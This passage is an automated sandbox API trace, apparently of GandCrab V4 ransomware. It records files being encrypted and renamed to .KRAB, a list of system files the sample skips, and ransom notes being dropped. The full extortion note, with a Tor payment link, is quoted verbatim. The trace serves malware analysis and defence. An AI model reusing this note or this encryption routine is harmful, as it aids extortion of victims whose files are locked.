[0094.673] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0094.673] GetLastError () returned 0x0 [0094.673] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0094.673] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0094.674] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\Gw2dlbXFcR.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\gw2dlbxfcr.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0094.674] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0094.674] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0094.675] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x15857, lpOverlapped=0x0) returned 1 [0094.690] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffea7a9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.690] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x15857, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x15857, lpOverlapped=0x0) returned 1 [0094.691] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0094.691] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.694] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.695] CloseHandle (hObject=0x434) returned 1 [0094.695] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.695] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\Gw2dlbXFcR.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\gw2dlbxfcr.m4a"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\Gw2dlbXFcR.m4a.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\gw2dlbxfcr.m4a.krab")) returned 1 [0094.696] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.697] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0094.697] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0094.697] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0094.697] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\KRAB-DECRYPT.txt" [0094.697] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.697] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\KRAB-DECRYPT.txt.KRAB") returned 49 [0094.697] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\KRAB-DECRYPT.txt") returned 44 [0094.697] lstrlenW (lpString=".txt") returned 4 [0094.697] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.698] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0094.698] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.698] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\KRAB-DECRYPT.txt") returned 44 [0094.698] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\KRAB-DECRYPT.txt") returned 44 [0094.698] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0094.698] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0094.698] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0094.698] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0094.698] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0094.698] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0094.698] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0094.698] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0094.699] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0094.699] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0094.699] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.699] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0094.699] FindClose (in: hFindFile=0xfbd5a0 | out: hFindFile=0xfbd5a0) returned 1 [0094.699] CloseHandle (hObject=0x320) returned 1 [0094.699] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0094.699] lstrcmpW (lpString1="My Documents", lpString2=".") returned 1 [0094.699] lstrcmpW (lpString1="My Documents", lpString2="..") returned 1 [0094.699] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="My Documents" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\My Documents") returned="C:\\Users\\CIiHmnxMn6Ps\\My Documents" [0094.699] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\My Documents", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\My Documents\\") returned="C:\\Users\\CIiHmnxMn6Ps\\My Documents\\" [0094.699] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0094.700] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0094.700] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0094.700] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0094.700] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0094.700] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.700] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.701] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\My Documents\\\\KRAB-DECRYPT.txt") returned 52 [0094.701] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\My Documents\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\my documents\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0094.701] GetLastError () returned 0x50 [0094.701] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.702] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.702] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x29, wMilliseconds=0x386)) [0094.702] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.702] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0094.702] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0094.703] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\My Documents\\d2ca4a08d2ca4dee3d.lock") returned 58 [0094.703] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\My Documents\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\my documents\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0094.703] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.704] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.704] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\My Documents\\") returned 35 [0094.704] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\My Documents\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\My Documents\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\My Documents\\*" [0094.704] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\My Documents\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xffffffff [0094.704] CloseHandle (hObject=0x320) returned 1 [0094.704] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0094.704] lstrcmpW (lpString1="NetHood", lpString2=".") returned 1 [0094.705] lstrcmpW (lpString1="NetHood", lpString2="..") returned 1 [0094.705] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="NetHood" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\NetHood") returned="C:\\Users\\CIiHmnxMn6Ps\\NetHood" [0094.705] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\NetHood", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\NetHood\\") returned="C:\\Users\\CIiHmnxMn6Ps\\NetHood\\" [0094.705] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0094.705] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0094.705] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0094.705] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0094.705] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0094.705] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.705] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.706] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\NetHood\\\\KRAB-DECRYPT.txt") returned 47 [0094.706] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\NetHood\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\nethood\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0094.713] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0094.713] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0094.714] CloseHandle (hObject=0x320) returned 1 [0094.717] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.718] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.718] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x29, wMilliseconds=0x397)) [0094.718] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.719] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0094.719] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0094.719] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\NetHood\\d2ca4a08d2ca4dee3d.lock") returned 53 [0094.719] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\NetHood\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\nethood\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0094.721] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.721] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.721] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NetHood\\") returned 30 [0094.721] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\NetHood\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\NetHood\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\NetHood\\*" [0094.721] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\NetHood\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xffffffff [0094.721] CloseHandle (hObject=0x320) returned 1 [0094.722] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0094.722] lstrcmpW (lpString1="NTUSER.DAT", lpString2=".") returned 1 [0094.722] lstrcmpW (lpString1="NTUSER.DAT", lpString2="..") returned 1 [0094.722] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="NTUSER.DAT" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT") returned="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT" [0094.722] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.723] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT.KRAB") returned 37 [0094.723] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT") returned 32 [0094.723] lstrlenW (lpString=".DAT") returned 4 [0094.723] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.723] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".DAT ") returned 5 [0094.723] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.723] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT") returned 32 [0094.723] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT") returned 32 [0094.723] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="desktop.ini") returned 1 [0094.724] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="autorun.inf") returned 1 [0094.724] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="ntuser.dat") returned 0 [0094.724] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.724] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0094.724] lstrcmpW (lpString1="ntuser.dat.LOG1", lpString2=".") returned 1 [0094.724] lstrcmpW (lpString1="ntuser.dat.LOG1", lpString2="..") returned 1 [0094.724] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="ntuser.dat.LOG1" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG1") returned="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG1" [0094.724] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.724] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG1.KRAB") returned 42 [0094.724] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG1") returned 37 [0094.724] lstrlenW (lpString=".LOG1") returned 5 [0094.724] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.725] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".LOG1 ") returned 6 [0094.725] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.725] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG1") returned 37 [0094.725] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG1") returned 37 [0094.725] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="desktop.ini") returned 1 [0094.725] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="autorun.inf") returned 1 [0094.725] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="ntuser.dat") returned 1 [0094.725] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="iconcache.db") returned 1 [0094.725] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="bootsect.bak") returned 1 [0094.725] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="boot.ini") returned 1 [0094.725] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="ntuser.dat.log") returned 1 [0094.725] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="thumbs.db") returned -1 [0094.725] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="KRAB-DECRYPT.html") returned 1 [0094.725] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="KRAB-DECRYPT.txt") returned 1 [0094.725] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.726] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="ntldr") returned 1 [0094.726] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="NTDETECT.COM") returned 1 [0094.726] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="Bootfont.bin") returned 1 [0094.726] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.726] CryptAcquireContextW (in: phProv=0x338f3b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3b4*=0x10110a0) returned 1 [0094.726] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.727] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.727] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.727] CryptGenRandom (in: hProv=0x10110a0, dwLen=0x20, pbBuffer=0x338f44c | out: pbBuffer=0x338f44c) returned 1 [0094.727] CryptReleaseContext (hProv=0x10110a0, dwFlags=0x0) returned 1 [0094.727] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.728] CryptAcquireContextW (in: phProv=0x338f3b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, 